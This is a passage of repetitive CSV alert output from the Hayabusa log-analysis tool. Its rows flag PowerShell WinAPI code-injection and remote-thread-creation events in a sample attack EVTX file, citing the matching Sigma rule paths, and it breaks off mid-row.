02:16:16.364 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.364 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.380 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.380 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.395 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.395 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.411 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.411 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.426 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.426 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.458 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.458 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.473 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.473 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.489 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.489 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.505 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.505 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.520 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.520 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.536 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.536 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.551 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.551 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.567 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.567 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.583 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.583 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.598 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.598 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.614 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.614 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.630 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.630 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.661 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.661 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.692 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.692 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.708 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.708 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.723 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.723 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.739 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.739 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.755 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.755 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.770 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.770 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.801 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.801 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.817 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.817 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.833 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.833 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.848 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.848 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.864 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.864 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.880 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.880 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.895 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.895 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.926 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.926 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.942 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.942 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.973 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.973 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.989 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.989 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.005 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.005 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.020 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.020 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.036 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.036 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.051 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.051 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.083 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.083 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.098 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.098 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.114 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.114 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.130 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.130 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.145 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.145 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.161 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.161 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.176 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.176 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.192 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.192 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.208 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.208 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.223 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense 